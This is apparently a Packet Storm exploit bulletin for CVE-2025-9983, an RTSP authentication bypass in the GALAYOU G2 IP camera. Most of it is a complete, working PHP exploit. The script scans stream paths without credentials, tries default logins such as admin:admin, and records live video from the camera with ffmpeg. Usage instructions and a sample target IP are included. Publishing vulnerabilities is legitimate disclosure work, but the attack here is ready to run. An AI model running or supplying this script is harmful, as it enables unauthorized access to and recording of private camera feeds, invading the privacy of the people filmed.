{“lastseen”:”2025-12-23T17:16:04″,”description”:”A critical authentication bypass vulnerability exists in the RTSP service of the GALAYOU G2 IP camera. The device exposes multiple RTSP stream endpoints that can be accessed without valid credentials, even when authentication is enabled…”,”published”:”2025-12-23T00:00:00″,”modified”:”2025-12-23T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 GALAYOU G2 IP Camera Authentication Bypass”,”source”:””,”references”:””,”id”:”PACKETSTORM:213259″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-9983″],”sourceData”:”=============================================================================================================================================\\n | # Title : GALAYOU G2 IP Camera \u2013 RTSP Credential Authentication Bypass |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/www.galayou-store.com\/g2 |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/210931\/ \\u0026 \\tCVE-2025-9983\\n \\n [+] Summary : A critical authentication bypass vulnerability exists in the RTSP service of the GALAYOU G2 IP camera.\\n The device exposes multiple RTSP stream endpoints that can be accessed without valid credentials, even when authentication is enabled.\\n \\n An unauthenticated remote attacker can directly connect to the video stream and retrieve live footage without authorization.\\n \\n [+] POC :\\n \\n Steps to use it on Windows: Download and install FFmpeg:\\n \\n 1. Go to: https:\/\/ffmpeg.org\/download.html\\n 2. Select \\”Windows builds from gyan.dev\\”\\n 3. Download the latest version (e.g., ffmpeg-release-essentials.zip)\\n 4. Extract and copy:\\n \\n – ffmpeg.exe\\n \\n – ffprobe.exe\\n \\n 5. Place both files in the same PHP script folder\\n \\n 2. Using it from the command line:\\n \\n # Simple method:\\n php poc.php 14.45.222.129\\n \\n # Or using the options:\\n php poc.php -t 14.45.222.129\\n \\n # With a custom port:\\n php poc.php -t 14.45.222.129 -p 8554\\n \\n 3. If FFmpeg elsewhere:\\n \\n # You can add it to the PATH environment variables:\\n 1. Press Win + R and type \\”systempropertiesadvanced\\”\\n 2. Click \\”Environment Variables\\”\\n 3. In \\”System variables\\”, select \\”Path\\” and click \\”Edit\\”\\n 4. Add the path to the ffmpeg folder\\n 5. Restart Command Prompt\\n \\n \\u003c?php\\n \\n class RTSPBypassExploit {\\n private $target;\\n private $port = 554;\\n private $streams = [];\\n private $timeout = 8;\\n private $captureDuration = 5;\\n private $cliMode = true;\\n private $isWindows = false;\\n \\n public function __construct($target, $cliMode = true) {\\n $this-\\u003etarget = $target;\\n $this-\\u003ecliMode = $cliMode;\\n $this-\\u003eisWindows = (strtoupper(substr(PHP_OS, 0, 3)) === ‘WIN’);\\n }\\n \\n \/**\\n * \u062a\u0646\u0641\u064a\u0630 \u0623\u0645\u0631 ffprobe \u0628\u0634\u0643\u0644 \u0622\u0645\u0646\\n *\/\\n private function executeFFprobe($url) {\\n if ($this-\\u003eisWindows) {\\n \/\/ \u0623\u0645\u0631 Windows\\n $command = sprintf(\\n ‘ffprobe.exe -loglevel error -rtsp_transport tcp -timeout 3000000 -i \\”%s\\” 2\\u003e\\u00261’,\\n $url\\n );\\n } else {\\n \/\/ \u0623\u0645\u0631 Linux\/Unix\\n $command = sprintf(\\n ‘timeout %d ffprobe -loglevel error -rtsp_transport tcp -timeout 3000000 -i %s 2\\u003e\\u00261’,\\n $this-\\u003etimeout,\\n escapeshellarg($url)\\n );\\n }\\n \\n $output = [];\\n $returnCode = 0;\\n \\n exec($command, $output, $returnCode);\\n \\n $outputStr = implode(\\”\\\\n\\”, $output);\\n \\n \/\/ \u062a\u0633\u062c\u064a\u0644 \u0627\u0644\u0646\u062a\u0627\u0626\u062c \u0644\u0644\u062a\u0634\u062e\u064a\u0635\\n if ($this-\\u003ecliMode) {\\n echo \\”[DEBUG] Testing: {$url}\\\\n\\”;\\n if (strlen($outputStr) \\u003e 0) {\\n echo \\”[DEBUG] Output: \\” . substr($outputStr, 0, 200) . \\”\\\\n\\”;\\n }\\n }\\n \\n \/\/ \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0627\u0644\u0646\u062c\u0627\u062d\\n if ($returnCode === 0) {\\n return true;\\n }\\n \\n \/\/ \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0623\u062e\u0637\u0627\u0621 401 (\u063a\u064a\u0631 \u0645\u0635\u0631\u062d)\\n if (strpos($outputStr, ‘401’) === false \\u0026\\u0026 \\n strpos($outputStr, ‘Unauthorized’) === false) {\\n \/\/ \u0644\u0627 \u064a\u0648\u062c\u062f \u062e\u0637\u0623 401\u060c \u0642\u062f \u064a\u0643\u0648\u0646 \u0627\u0644\u0648\u0635\u0648\u0644 \u0645\u0645\u0643\u0646\u0627\u064b\\n if (strpos($outputStr, ‘Connection refused’) === false \\u0026\\u0026\\n strpos($outputStr, ‘Connection timed out’) === false \\u0026\\u0026\\n strpos($outputStr, ‘Unable to open’) === false) {\\n return true;\\n }\\n }\\n \\n return false;\\n }\\n \\n \/**\\n * \u0641\u062d\u0635 \u0648\u062c\u0648\u062f \u062f\u0641\u0642 RTSP\\n *\/\\n public function checkStream($url) {\\n try {\\n return $this-\\u003eexecuteFFprobe($url);\\n } catch (Exception $e) {\\n if ($this-\\u003ecliMode) {\\n echo \\”[-] Error checking stream: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n }\\n return false;\\n }\\n }\\n \\n \/**\\n * \u0645\u0633\u062d \u062c\u0645\u064a\u0639 \u0645\u0633\u0627\u0631\u0627\u062a RTSP \u0627\u0644\u0645\u062d\u062a\u0645\u0644\u0629\\n *\/\\n public function scanStreams() {\\n $paths = [\\n \\”\/live\/main\\”, \\”\/stream1\\”, \\”\/stream2\\”, \\”\/h264\\”, \\n \\”\/11\\”, \\”\/12\\”, \\”\/cam\/realmonitor\\”, \\”\/media\/video1\\”,\\n \\”\/main\\”, \\”\/sub\\”, \\”\/video\\”, \\”\/live\\”,\\n \\”\/0\\”, \\”\/1\\”, \\”\/2\\”, \\”\/ch0_0.h264\\”, \\”\/ch0_1.h264\\”\\n ];\\n \\n $found = 0;\\n \\n foreach ($paths as $path) {\\n \/\/ \u0627\u0644\u0645\u062d\u0627\u0648\u0644\u0629 \u0628\u062f\u0648\u0646 \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0627\u0639\u062a\u0645\u0627\u062f\\n $url = \\”rtsp:\/\/{$this-\\u003etarget}:{$this-\\u003eport}{$path}\\”;\\n if ($this-\\u003echeckStream($url)) {\\n $this-\\u003estreams[] = [\\n ‘url’ =\\u003e $url,\\n ‘type’ =\\u003e ‘no_auth’,\\n ‘tested’ =\\u003e false\\n ];\\n $found++;\\n if ($this-\\u003ecliMode) {\\n echo \\”[+] Found stream: {$url}\\\\n\\”;\\n }\\n }\\n \\n \/\/ \u0627\u0644\u0645\u062d\u0627\u0648\u0644\u0629 \u0628\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0627\u0639\u062a\u0645\u0627\u062f \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629\\n $credentials = [\\n ‘admin:admin’,\\n ‘admin:123456’,\\n ‘admin:password’,\\n ‘admin:’,\\n ‘user:user’,\\n ‘admin:admin123’\\n ];\\n \\n foreach ($credentials as $cred) {\\n $testUrl = \\”rtsp:\/\/{$cred}@{$this-\\u003etarget}:{$this-\\u003eport}{$path}\\”;\\n if ($this-\\u003echeckStream($testUrl)) {\\n $this-\\u003estreams[] = [\\n ‘url’ =\\u003e $testUrl,\\n ‘type’ =\\u003e ‘with_auth’,\\n ‘tested’ =\\u003e false\\n ];\\n $found++;\\n if ($this-\\u003ecliMode) {\\n echo \\”[+] Found stream with creds {$cred}: {$testUrl}\\\\n\\”;\\n }\\n break; \/\/ \u0627\u0643\u062a\u0641\u0627\u0621 \u0628\u0623\u0648\u0644 \u0645\u062c\u0645\u0648\u0639\u0629 \u0646\u0627\u062c\u062d\u0629\\n }\\n }\\n \\n \/\/ \u0625\u0636\u0627\u0641\u0629 \u062a\u0623\u062e\u064a\u0631 \u0644\u062a\u062c\u0646\u0628 \u062d\u0645\u0644 \u0643\u0628\u064a\u0631 \u0639\u0644\u0649 \u0627\u0644\u062e\u0627\u062f\u0645\\n if ($this-\\u003eisWindows) {\\n usleep(50000); \/\/ 0.05 \u062b\u0627\u0646\u064a\u0629\\n }\\n }\\n \\n return $found;\\n }\\n \\n \/**\\n * \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0625\u0645\u0643\u0627\u0646\u064a\u0629 \u062a\u062c\u0627\u0648\u0632 \u0627\u0644\u0645\u0635\u0627\u062f\u0642\u0629\\n *\/\\n public function verifyBypass() {\\n $vulnerableStreams = [];\\n \\n foreach ($this-\\u003estreams as \\u0026$stream) {\\n if ($stream[‘tested’]) {\\n continue;\\n }\\n \\n \/\/ \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0627\u0644\u0631\u0627\u0628\u0637 \u0627\u0644\u0646\u0638\u064a\u0641 (\u0625\u0632\u0627\u0644\u0629 \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0627\u0639\u062a\u0645\u0627\u062f \u0625\u0646 \u0648\u062c\u062f\u062a)\\n $url = $stream[‘url’];\\n \\n if (strpos($url, ‘@’) !== false) {\\n $parts = explode(‘@’, $url);\\n $cleanUrl = \\”rtsp:\/\/\\” . end($parts);\\n } else {\\n $cleanUrl = $url;\\n }\\n \\n if ($this-\\u003ecliMode) {\\n echo \\”[*] Testing bypass for: \\” . htmlspecialchars($cleanUrl) . \\”\\\\n\\”;\\n }\\n \\n if ($this-\\u003echeckStream($cleanUrl)) {\\n if ($this-\\u003ecliMode) {\\n echo \\”[!] VULNERABLE: \\” . htmlspecialchars($cleanUrl) . \\”\\\\n\\”;\\n }\\n $stream[‘vulnerable’] = true;\\n $vulnerableStreams[] = $cleanUrl;\\n \\n \/\/ \u0627\u0644\u062a\u0642\u0627\u0637 \u0627\u0644\u062f\u0641\u0642\\n $this-\\u003ecaptureStream($cleanUrl);\\n } else {\\n $stream[‘vulnerable’] = false;\\n }\\n \\n $stream[‘tested’] = true;\\n }\\n \\n return $vulnerableStreams;\\n }\\n \\n \/**\\n * \u0627\u0644\u062a\u0642\u0627\u0637 \u062f\u0641\u0642 \u0627\u0644\u0641\u064a\u062f\u064a\u0648\\n *\/\\n public function captureStream($url) {\\n $timestamp = time();\\n $outputFile = \\”capture_{$this-\\u003etarget}_{$timestamp}.mp4\\”;\\n \\n if ($this-\\u003eisWindows) {\\n $command = sprintf(\\n ‘ffmpeg.exe -y -rtsp_transport tcp -i \\”%s\\” -t %d -c copy \\”%s\\” 2\\u003enul’,\\n $url,\\n $this-\\u003ecaptureDuration,\\n $outputFile\\n );\\n } else {\\n $command = sprintf(\\n ‘timeout %d ffmpeg -y -rtsp_transport tcp -i %s -t %d -c copy %s 2\\u003e\/dev\/null’,\\n $this-\\u003ecaptureDuration + 5,\\n escapeshellarg($url),\\n $this-\\u003ecaptureDuration,\\n escapeshellarg($outputFile)\\n );\\n }\\n \\n if ($this-\\u003ecliMode) {\\n echo \\”[*] Capturing {$this-\\u003ecaptureDuration} seconds to: {$outputFile}\\\\n\\”;\\n }\\n \\n exec($command, $output, $returnCode);\\n \\n if (file_exists($outputFile) \\u0026\\u0026 filesize($outputFile) \\u003e 1024) {\\n $size = filesize($outputFile);\\n if ($this-\\u003ecliMode) {\\n echo \\”[+] Capture successful: {$outputFile} (\\” . $this-\\u003eformatBytes($size) . \\”)\\\\n\\”;\\n }\\n return $outputFile;\\n } elseif (file_exists($outputFile)) {\\n \/\/ \u062d\u0630\u0641 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0627\u0644\u0635\u063a\u064a\u0631\u0629 \u062c\u062f\u0627\u064b (\u0641\u0634\u0644 \u0627\u0644\u062a\u0642\u0627\u0637)\\n unlink($outputFile);\\n }\\n \\n return false;\\n }\\n \\n \/**\\n * \u062a\u0646\u0633\u064a\u0642 \u062d\u062c\u0645 \u0627\u0644\u0645\u0644\u0641 \u0644\u0644\u0639\u0631\u0636\\n *\/\\n private function formatBytes($bytes, $precision = 2) {\\n $units = [‘B’, ‘KB’, ‘MB’, ‘GB’, ‘TB’];\\n $bytes = max($bytes, 0);\\n $pow = floor(($bytes ? log($bytes) : 0) \/ log(1024));\\n $pow = min($pow, count($units) – 1);\\n $bytes \/= pow(1024, $pow);\\n \\n return round($bytes, $precision) . ‘ ‘ . $units[$pow];\\n }\\n \\n \/**\\n * \u0641\u062d\u0635 \u0627\u0644\u0645\u062a\u0637\u0644\u0628\u0627\u062a \u0627\u0644\u0646\u0638\u0627\u0645\u064a\u0629 \u0644\u0646\u0638\u0627\u0645 Windows\\n *\/\\n private function checkWindowsRequirements() {\\n $tools = [\\n ‘ffprobe’ =\\u003e ‘ffprobe.exe’,\\n ‘ffmpeg’ =\\u003e ‘ffmpeg.exe’\\n ];\\n \\n $missing = [];\\n \\n \/\/ \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0627\u0644\u0623\u062f\u0648\u0627\u062a \u0641\u064a \u0627\u0644\u0645\u0633\u0627\u0631 \u0623\u0648 \u0627\u0644\u062f\u0644\u064a\u0644 \u0627\u0644\u062d\u0627\u0644\u064a\\n foreach ($tools as $name =\\u003e $exe) {\\n $found = false;\\n \\n \/\/ \u0627\u0644\u062a\u062d\u0642\u0642 \u0641\u064a \u0627\u0644\u0645\u0633\u0627\u0631\\n $pathCheck = shell_exec(‘where ‘ . $exe . ‘ 2\\u003enul’);\\n if (!empty($pathCheck)) {\\n $found = true;\\n }\\n \\n \/\/ \u0627\u0644\u062a\u062d\u0642\u0642 \u0641\u064a \u0627\u0644\u062f\u0644\u064a\u0644 \u0627\u0644\u062d\u0627\u0644\u064a\\n if (!$found \\u0026\\u0026 file_exists($exe)) {\\n $found = true;\\n }\\n \\n \/\/ \u0627\u0644\u062a\u062d\u0642\u0642 \u0641\u064a \u062f\u0644\u064a\u0644 ffmpeg \u0627\u0644\u0634\u0627\u0626\u0639\\n if (!$found \\u0026\\u0026 file_exists(‘ffmpeg\\\\\\\\bin\\\\\\\\’ . $exe)) {\\n $found = true;\\n }\\n \\n if (!$found) {\\n $missing[] = $name;\\n }\\n }\\n \\n if (!empty($missing)) {\\n if ($this-\\u003ecliMode) {\\n echo \\”[-] Missing required tools: \\” . implode(‘, ‘, $missing) . \\”\\\\n\\”;\\n echo \\”[-] Please download ffmpeg from: https:\/\/ffmpeg.org\/download.html\\\\n\\”;\\n echo \\”[-] Extract ffmpeg.exe and ffprobe.exe to this directory or add to PATH\\\\n\\”;\\n }\\n return false;\\n }\\n \\n return true;\\n }\\n \\n \/**\\n * \u0641\u062d\u0635 \u0627\u0644\u0645\u062a\u0637\u0644\u0628\u0627\u062a \u0627\u0644\u0646\u0638\u0627\u0645\u064a\u0629 \u0644\u0646\u0638\u0627\u0645 Linux\\n *\/\\n private function checkLinuxRequirements() {\\n $requirements = [\\n ‘ffprobe’ =\\u003e ‘which ffprobe 2\\u003e\/dev\/null’,\\n ‘ffmpeg’ =\\u003e ‘which ffmpeg 2\\u003e\/dev\/null’,\\n ‘timeout’ =\\u003e ‘which timeout 2\\u003e\/dev\/null’\\n ];\\n \\n $missing = [];\\n \\n foreach ($requirements as $tool =\\u003e $command) {\\n exec($command, $output, $returnCode);\\n if ($returnCode !== 0) {\\n $missing[] = $tool;\\n }\\n }\\n \\n if (!empty($missing)) {\\n if ($this-\\u003ecliMode) {\\n echo \\”[-] Missing required tools: \\” . implode(‘, ‘, $missing) . \\”\\\\n\\”;\\n echo \\”[-] Install with: sudo apt-get install ffmpeg coreutils\\\\n\\”;\\n }\\n return false;\\n }\\n \\n return true;\\n }\\n \\n \/**\\n * \u0641\u062d\u0635 \u0627\u0644\u0645\u062a\u0637\u0644\u0628\u0627\u062a \u0627\u0644\u0646\u0638\u0627\u0645\u064a\u0629 \u0627\u0644\u0639\u0627\u0645\u0629\\n *\/\\n private function checkRequirements() {\\n \/\/ \u0641\u062d\u0635 \u0635\u0644\u0627\u062d\u064a\u0627\u062a exec\\n if (!function_exists(‘exec’)) {\\n if ($this-\\u003ecliMode) {\\n echo \\”[-] exec() function is disabled in php.ini\\\\n\\”;\\n echo \\”[-] Enable it or contact your administrator\\\\n\\”;\\n }\\n return false;\\n }\\n \\n if ($this-\\u003eisWindows) {\\n return $this-\\u003echeckWindowsRequirements();\\n } else {\\n return $this-\\u003echeckLinuxRequirements();\\n }\\n }\\n \\n \/**\\n * \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\\n *\/\\n public function exploit() {\\n if ($this-\\u003ecliMode) {\\n echo \\”========================================\\\\n\\”;\\n echo \\”CVE-2025-9983 – GALAYOU G2 RTSP Bypass\\\\n\\”;\\n echo \\” By indoushka \\\\n\\”;\\n echo \\”Target: {$this-\\u003etarget}\\\\n\\”;\\n echo \\”OS: \\” . ($this-\\u003eisWindows ? ‘Windows’ : ‘Linux\/Unix’) . \\”\\\\n\\”;\\n echo \\”========================================\\\\n\\\\n\\”;\\n }\\n \\n \/\/ \u0641\u062d\u0635 \u0627\u0644\u0645\u062a\u0637\u0644\u0628\u0627\u062a\\n if (!$this-\\u003echeckRequirements()) {\\n return [\\n ‘success’ =\\u003e false,\\n ‘message’ =\\u003e ‘Missing requirements’,\\n ‘streams’ =\\u003e []\\n ];\\n }\\n \\n \/\/ \u0627\u0644\u0645\u0633\u062d\\n if ($this-\\u003ecliMode) {\\n echo \\”[*] Scanning for RTSP streams…\\\\n\\”;\\n }\\n \\n $found = $this-\\u003escanStreams();\\n \\n if ($found === 0) {\\n if ($this-\\u003ecliMode) {\\n echo \\”[-] No streams found\\\\n\\”;\\n echo \\”[*] Possible reasons:\\\\n\\”;\\n echo \\” 1. Camera is not accessible\\\\n\\”;\\n echo \\” 2. Port 554 is blocked\\\\n\\”;\\n echo \\” 3. Camera uses different RTSP paths\\\\n\\”;\\n }\\n return [\\n ‘success’ =\\u003e false,\\n ‘message’ =\\u003e ‘No streams found’,\\n ‘streams’ =\\u003e []\\n ];\\n }\\n \\n if ($this-\\u003ecliMode) {\\n echo \\”\\\\n[*] Found {$found} stream(s)\\\\n\\”;\\n echo \\”[*] Verifying credential bypass…\\\\n\\\\n\\”;\\n }\\n \\n $vulnerable = $this-\\u003everifyBypass();\\n \\n if (!empty($vulnerable)) {\\n $result = [\\n ‘success’ =\\u003e true,\\n ‘message’ =\\u003e ‘Exploitation successful’,\\n ‘vulnerable_count’ =\\u003e count($vulnerable),\\n ‘vulnerable_streams’ =\\u003e $vulnerable,\\n ‘all_streams’ =\\u003e $this-\\u003estreams\\n ];\\n \\n if ($this-\\u003ecliMode) {\\n echo \\”\\\\n[+] Exploitation successful!\\\\n\\”;\\n echo \\”[+] Vulnerable streams: \\” . count($vulnerable) . \\”\\\\n\\”;\\n foreach ($vulnerable as $stream) {\\n echo \\” – \\” . htmlspecialchars($stream) . \\”\\\\n\\”;\\n }\\n }\\n } else {\\n $result = [\\n ‘success’ =\\u003e false,\\n ‘message’ =\\u003e ‘No vulnerable streams found’,\\n ‘vulnerable_count’ =\\u003e 0,\\n ‘all_streams’ =\\u003e $this-\\u003estreams\\n ];\\n \\n if ($this-\\u003ecliMode) {\\n echo \\”\\\\n[-] No vulnerable streams found\\\\n\\”;\\n echo \\”[*] The camera might not be vulnerable to CVE-2025-9983\\\\n\\”;\\n }\\n }\\n \\n return $result;\\n }\\n }\\n \\n \/\/ ==================== \u0645\u0639\u0627\u0644\u062c CLI ====================\\n if (PHP_SAPI === ‘cli’) {\\n \/\/ \u062a\u062d\u0644\u064a\u0644 \u0648\u0633\u0627\u0626\u0637 CLI \u0628\u0634\u0643\u0644 \u0645\u0628\u0633\u0637\\n $target = ”;\\n $port = 554;\\n \\n if ($argc \\u003e= 2) {\\n \/\/ \u062f\u0639\u0645 \u0634\u0643\u0644\u064a\u0646: poc.php 192.168.1.1 \u0623\u0648 poc.php -t 192.168.1.1\\n if ($argv[1] == ‘-t’ \\u0026\\u0026 isset($argv[2])) {\\n $target = $argv[2];\\n if (isset($argv[3]) \\u0026\\u0026 ($argv[3] == ‘-p’ || $argv[3] == ‘–port’) \\u0026\\u0026 isset($argv[4])) {\\n $port = intval($argv[4]);\\n }\\n } else {\\n $target = $argv[1];\\n }\\n }\\n \\n if (empty($target)) {\\n echo \\”GALAYOU G2 RTSP Credential Bypass Exploit (Windows\/Linux)\\\\n\\”;\\n echo \\”=========================================================\\\\n\\”;\\n echo \\”Usage:\\\\n\\”;\\n echo \\” php \\” . basename(__FILE__) . \\” \\u003ctarget_ip\\u003e\\\\n\\”;\\n echo \\” php \\” . basename(__FILE__) . \\” -t \\u003ctarget_ip\\u003e [-p \\u003cport\\u003e]\\\\n\\”;\\n echo \\”\\\\nExamples:\\\\n\\”;\\n echo \\” php \\” . basename(__FILE__) . \\” 192.168.1.100\\\\n\\”;\\n echo \\” php \\” . basename(__FILE__) . \\” -t 192.168.1.100 -p 554\\\\n\\”;\\n echo \\”\\\\nNote for Windows users:\\\\n\\”;\\n echo \\” 1. Download ffmpeg from: https:\/\/ffmpeg.org\/download.html\\\\n\\”;\\n echo \\” 2. Extract ffmpeg.exe and ffprobe.exe to this directory\\\\n\\”;\\n exit(0);\\n }\\n \\n \/\/ \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 IP\\n if (!filter_var($target, FILTER_VALIDATE_IP)) {\\n echo \\”[-] Error: Invalid IP address\\\\n\\”;\\n exit(1);\\n }\\n \\n \/\/ \u0625\u0646\u0634\u0627\u0621 \u0648\u062a\u0646\u0641\u064a\u0630\\n $exploit = new RTSPBypassExploit($target, true);\\n $result = $exploit-\\u003eexploit();\\n \\n if (!$result[‘success’]) {\\n exit(1);\\n }\\n \\n exit(0);\\n \\n } else {\\n \/\/ ==================== \u0648\u0627\u062c\u0647\u0629 \u0648\u064a\u0628 \u0645\u0628\u0633\u0637\u0629 ====================\\n ?\\u003e\\n \\u003c!DOCTYPE html\\u003e\\n \\u003chtml lang=\\”en\\”\\u003e\\n \\u003chead\\u003e\\n \\u003cmeta charset=\\”UTF-8\\”\\u003e\\n \\u003cmeta name=\\”viewport\\” content=\\”width=device-width, initial-scale=1.0\\”\\u003e\\n \\u003ctitle\\u003eCVE-2025-9983 – RTSP Bypass\\u003c\/title\\u003e\\n \\u003cstyle\\u003e\\n body { font-family: Arial, sans-serif; margin: 20px; }\\n .container { max-width: 800px; margin: 0 auto; }\\n h1 { color: #333; }\\n .form-group { margin: 15px 0; }\\n input[type=\\”text\\”] { padding: 8px; width: 300px; }\\n button { padding: 10px 20px; background: #007bff; color: white; border: none; cursor: pointer; }\\n .result { margin-top: 20px; padding: 15px; background: #f5f5f5; border-radius: 5px; }\\n .warning { color: #856404; background: #fff3cd; padding: 10px; border-radius: 5px; }\\n \\u003c\/style\\u003e\\n \\u003c\/head\\u003e\\n \\u003cbody\\u003e\\n \\u003cdiv class=\\”container\\”\\u003e\\n \\u003ch1\\u003eCVE-2025-9983 – GALAYOU G2 RTSP Bypass\\u003c\/h1\\u003e\\n \\n \\u003cdiv class=\\”warning\\”\\u003e\\n \\u003cstrong\\u003e Warning:\\u003c\/strong\\u003e This tool is for educational purposes only.\\n Use only on systems you own or have permission to test.\\n \\u003c\/div\\u003e\\n \\n \\u003cp\\u003eFor full functionality, please use the CLI version.\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eCLI Usage:\\u003c\/strong\\u003e \\u003ccode\\u003ephp \\u003c?php echo basename(__FILE__); ?\\u003e \\u0026lt;target_ip\\u0026gt;\\u003c\/code\\u003e\\u003c\/p\\u003e\\n \\n \\u003chr\\u003e\\n \\n \\u003ch3\\u003eDownload FFmpeg for Windows:\\u003c\/h3\\u003e\\n \\u003col\\u003e\\n \\u003cli\\u003eDownload from: \\u003ca href=\\”https:\/\/ffmpeg.org\/download.html\\” target=\\”_blank\\”\\u003ehttps:\/\/ffmpeg.org\/download.html\\u003c\/a\\u003e\\u003c\/li\\u003e\\n \\u003cli\\u003eChoose \\”Windows builds from gyan.dev\\”\\u003c\/li\\u003e\\n \\u003cli\\u003eDownload the latest release\\u003c\/li\\u003e\\n \\u003cli\\u003eExtract ffmpeg.exe and ffprobe.exe to the same directory as this script\\u003c\/li\\u003e\\n \\u003c\/ol\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e\\n \\u003c?php\\n }\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213259″,”cvss”:{“score”:7.1,”severity”:”HIGH”,”vector”:”CVSS:4.0\/AV:A\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/SC:N\/VI:N\/SI:N\/VA:N\/SA:N”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/213259\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-23T17:16:04″,”description”:”A critical authentication bypass vulnerability exists in the RTSP service of the GALAYOU G2 IP camera. The device exposes multiple RTSP stream endpoints that can…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,50,12,15,13,53,7,11,5],"class_list":["post-32545","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-71","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n